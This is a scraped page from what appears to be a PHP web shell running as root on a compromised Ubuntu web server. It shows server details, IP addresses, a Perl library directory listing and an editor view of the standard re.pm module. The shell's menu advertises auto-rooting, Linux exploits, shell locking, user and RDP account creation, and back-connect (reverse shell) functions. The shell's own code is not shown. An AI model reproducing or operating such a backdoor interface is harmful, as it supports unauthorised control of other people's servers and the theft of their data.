Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl /
5.26.1 /
[ HOME SHELL ]
Name
Size
Permission
Action
B
[ DIR ]
drwxr-xr-x
CORE
[ DIR ]
drwxr-xr-x
Compress
[ DIR ]
drwxr-xr-x
Data
[ DIR ]
drwxr-xr-x
Devel
[ DIR ]
drwxr-xr-x
Digest
[ DIR ]
drwxr-xr-x
Encode
[ DIR ]
drwxr-xr-x
File
[ DIR ]
drwxr-xr-x
Filter
[ DIR ]
drwxr-xr-x
Hash
[ DIR ]
drwxr-xr-x
I18N
[ DIR ]
drwxr-xr-x
IO
[ DIR ]
drwxr-xr-x
IPC
[ DIR ]
drwxr-xr-x
List
[ DIR ]
drwxr-xr-x
MIME
[ DIR ]
drwxr-xr-x
Math
[ DIR ]
drwxr-xr-x
PerlIO
[ DIR ]
drwxr-xr-x
Scalar
[ DIR ]
drwxr-xr-x
Sub
[ DIR ]
drwxr-xr-x
Sys
[ DIR ]
drwxr-xr-x
Tie
[ DIR ]
drwxr-xr-x
Time
[ DIR ]
drwxr-xr-x
Unicode
[ DIR ]
drwxr-xr-x
asm
[ DIR ]
drwxr-xr-x
asm-generic
[ DIR ]
drwxr-xr-x
auto
[ DIR ]
drwxr-xr-x
bits
[ DIR ]
drwxr-xr-x
gnu
[ DIR ]
drwxr-xr-x
linux
[ DIR ]
drwxr-xr-x
sys
[ DIR ]
drwxr-xr-x
threads
[ DIR ]
drwxr-xr-x
B.pm
30.72
KB
-rw-r--r--
Config.pm
3.29
KB
-rw-r--r--
Config.pod
250.68
KB
-rw-r--r--
Config_git.pl
409
B
-rw-r--r--
Config_heavy.pl
53.13
KB
-rw-r--r--
Cwd.pm
18.1
KB
-rw-r--r--
DB_File.pm
63.52
KB
-rw-r--r--
DynaLoader.pm
10.23
KB
-rw-r--r--
Encode.pm
35.64
KB
-rw-r--r--
Errno.pm
4.82
KB
-rw-r--r--
Fcntl.pm
2.11
KB
-rw-r--r--
GDBM_File.pm
1.51
KB
-rw-r--r--
IO.pm
469
B
-rw-r--r--
NDBM_File.pm
2.44
KB
-rw-r--r--
O.pm
4.11
KB
-rw-r--r--
ODBM_File.pm
2.33
KB
-rw-r--r--
Opcode.pm
15.52
KB
-rw-r--r--
POSIX.pm
19.72
KB
-rw-r--r--
POSIX.pod
71.98
KB
-rw-r--r--
SDBM_File.pm
3.46
KB
-rw-r--r--
Socket.pm
13.24
KB
-rw-r--r--
Storable.pm
42.23
KB
-rw-r--r--
_h2ph_pre.ph
28.63
KB
-rw-r--r--
arybase.pm
2.75
KB
-rw-r--r--
attributes.pm
3.03
KB
-rw-r--r--
encoding.pm
22.45
KB
-rw-r--r--
endian.ph
4.36
KB
-rw-r--r--
errno.ph
23
B
-rw-r--r--
features.ph
12.64
KB
-rw-r--r--
lib.pm
2.23
KB
-rw-r--r--
mro.pm
9.86
KB
-rw-r--r--
ops.pm
997
B
-rw-r--r--
re.pm
8.5
KB
-rw-r--r--
signal.ph
3.3
KB
-rw-r--r--
stdarg.ph
2.8
KB
-rw-r--r--
stdc-predef.ph
921
B
-rw-r--r--
stddef.ph
12.08
KB
-rw-r--r--
syscall.ph
86
B
-rw-r--r--
sysexits.ph
1.26
KB
-rw-r--r--
syslimits.ph
452
B
-rw-r--r--
syslog.ph
85
B
-rw-r--r--
threads.pm
35.69
KB
-rw-r--r--
wait.ph
83
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : re.pm
package re; # pragma for controlling the regexp engine use strict; use warnings; our $VERSION = "0.34"; our @ISA = qw(Exporter); our @EXPORT_OK = ('regmust', qw(is_regexp regexp_pattern regname regnames regnames_count)); our %EXPORT_OK = map { $_ => 1 } @EXPORT_OK; my %bitmask = ( taint => 0x00100000, # HINT_RE_TAINT eval => 0x00200000, # HINT_RE_EVAL ); my $flags_hint = 0x02000000; # HINT_RE_FLAGS my $PMMOD_SHIFT = 0; my %reflags = ( m => 1 << ($PMMOD_SHIFT + 0), s => 1 << ($PMMOD_SHIFT + 1), i => 1 << ($PMMOD_SHIFT + 2), x => 1 << ($PMMOD_SHIFT + 3), xx => 1 << ($PMMOD_SHIFT + 4), n => 1 << ($PMMOD_SHIFT + 5), p => 1 << ($PMMOD_SHIFT + 6), strict => 1 << ($PMMOD_SHIFT + 10), # special cases: d => 0, l => 1, u => 2, a => 3, aa => 4, ); sub setcolor { eval { # Ignore errors require Term::Cap; my $terminal = Tgetent Term::Cap ({OSPEED => 9600}); # Avoid warning. my $props = $ENV{PERL_RE_TC} || 'md,me,so,se,us,ue'; my @props = split /,/, $props; my $colors = join "\t", map {$terminal->Tputs($_,1)} @props; $colors =~ s/\0//g; $ENV{PERL_RE_COLORS} = $colors; }; if ($@) { $ENV{PERL_RE_COLORS} ||= qq'\t\t> <\t> <\t\t'; } } my %flags = ( COMPILE => 0x0000FF, PARSE => 0x000001, OPTIMISE => 0x000002, TRIEC => 0x000004, DUMP => 0x000008, FLAGS => 0x000010, TEST => 0x000020, EXECUTE => 0x00FF00, INTUIT => 0x000100, MATCH => 0x000200, TRIEE => 0x000400, EXTRA => 0xFF0000, TRIEM => 0x010000, OFFSETS => 0x020000, OFFSETSDBG => 0x040000, STATE => 0x080000, OPTIMISEM => 0x100000, STACK => 0x280000, BUFFERS => 0x400000, GPOS => 0x800000, ); $flags{ALL} = -1 & ~($flags{OFFSETS}|$flags{OFFSETSDBG}|$flags{BUFFERS}); $flags{All} = $flags{all} = $flags{DUMP} | $flags{EXECUTE}; $flags{Extra} = $flags{EXECUTE} | $flags{COMPILE} | $flags{GPOS}; $flags{More} = $flags{MORE} = $flags{All} | $flags{TRIEC} | $flags{TRIEM} | $flags{STATE}; $flags{State} = $flags{DUMP} | $flags{EXECUTE} | $flags{STATE}; $flags{TRIE} = $flags{DUMP} | $flags{EXECUTE} | $flags{TRIEC}; if (defined &DynaLoader::boot_DynaLoader) { require XSLoader; XSLoader::load(); } # else we're miniperl # We need to work for miniperl, because the XS toolchain uses Text::Wrap, which # uses re 'taint'. sub _load_unload { my ($on)= @_; if ($on) { # We call install() every time, as if we didn't, we wouldn't # "see" any changes to the color environment var since # the last time it was called. # install() returns an integer, which if casted properly # in C resolves to a structure containing the regexp # hooks. Setting it to a random integer will guarantee # segfaults. $^H{regcomp} = install(); } else { delete $^H{regcomp}; } } sub bits { my $on = shift; my $bits = 0; my $turning_all_off = ! @_ && ! $on; if ($turning_all_off) { # Pretend were called with certain parameters, which are best dealt # with that way. push @_, keys %bitmask; # taint and eval push @_, 'strict'; } # Process each subpragma parameter ARG: foreach my $idx (0..$#_){ my $s=$_[$idx]; if ($s eq 'Debug' or $s eq 'Debugcolor') { setcolor() if $s =~/color/i; ${^RE_DEBUG_FLAGS} = 0 unless defined ${^RE_DEBUG_FLAGS}; for my $idx ($idx+1..$#_) { if ($flags{$_[$idx]}) { if ($on) { ${^RE_DEBUG_FLAGS} |= $flags{$_[$idx]}; } else { ${^RE_DEBUG_FLAGS} &= ~ $flags{$_[$idx]}; } } else { require Carp; Carp::carp("Unknown \"re\" Debug flag '$_[$idx]', possible flags: ", join(", ",sort keys %flags ) ); } } _load_unload($on ? 1 : ${^RE_DEBUG_FLAGS}); last; } elsif ($s eq 'debug' or $s eq 'debugcolor') { setcolor() if $s =~/color/i; _load_unload($on); last; } elsif (exists $bitmask{$s}) { $bits |= $bitmask{$s}; } elsif ($EXPORT_OK{$s}) { require Exporter; re->export_to_level(2, 're', $s); } elsif ($s eq 'strict') { if ($on) { $^H{reflags} |= $reflags{$s}; warnings::warnif('experimental::re_strict', "\"use re 'strict'\" is experimental"); # Turn on warnings if not already done. if (! warnings::enabled('regexp')) { require warnings; warnings->import('regexp'); $^H{re_strict} = 1; } } else { $^H{reflags} &= ~$reflags{$s} if $^H{reflags}; # Turn off warnings if we turned them on. warnings->unimport('regexp') if $^H{re_strict}; } if ($^H{reflags}) { $^H |= $flags_hint; } else { $^H &= ~$flags_hint; } } elsif ($s =~ s/^\///) { my $reflags = $^H{reflags} || 0; my $seen_charset; my $x_count = 0; while ($s =~ m/( . )/gx) { local $_ = $1; if (/[adul]/) { # The 'a' may be repeated; hide this from the rest of the # code by counting and getting rid of all of them, then # changing to 'aa' if there is a repeat. if ($_ eq 'a') { my $sav_pos = pos $s; my $a_count = $s =~ s/a//g; pos $s = $sav_pos - 1; # -1 because got rid of the 'a' if ($a_count > 2) { require Carp; Carp::carp( qq 'The "a" flag may only appear a maximum of twice' ); } elsif ($a_count == 2) { $_ = 'aa'; } } if ($on) { if ($seen_charset) { require Carp; if ($seen_charset ne $_) { Carp::carp( qq 'The "$seen_charset" and "$_" flags ' .qq 'are exclusive' ); } else { Carp::carp( qq 'The "$seen_charset" flag may not appear ' .qq 'twice' ); } } $^H{reflags_charset} = $reflags{$_}; $seen_charset = $_; } else { delete $^H{reflags_charset} if defined $^H{reflags_charset} && $^H{reflags_charset} == $reflags{$_}; } } elsif (exists $reflags{$_}) { if ($_ eq 'x') { $x_count++; if ($x_count > 2) { require Carp; Carp::carp( qq 'The "x" flag may only appear a maximum of twice' ); } elsif ($x_count == 2) { $_ = 'xx'; # First time through got the /x } } $on ? $reflags |= $reflags{$_} : ($reflags &= ~$reflags{$_}); } else { require Carp; Carp::carp( qq'Unknown regular expression flag "$_"' ); next ARG; } } ($^H{reflags} = $reflags or defined $^H{reflags_charset}) ? $^H |= $flags_hint : ($^H &= ~$flags_hint); } else { require Carp; Carp::carp("Unknown \"re\" subpragma '$s' (known ones are: ", join(', ', map {qq('$_')} 'debug', 'debugcolor', sort keys %bitmask), ")"); } } if ($turning_all_off) { _load_unload(0); $^H{reflags} = 0; $^H{reflags_charset} = 0; $^H &= ~$flags_hint; } $bits; } sub import { shift; $^H |= bits(1, @_); } sub unimport { shift; $^H &= ~ bits(0, @_); } 1; __END__
Close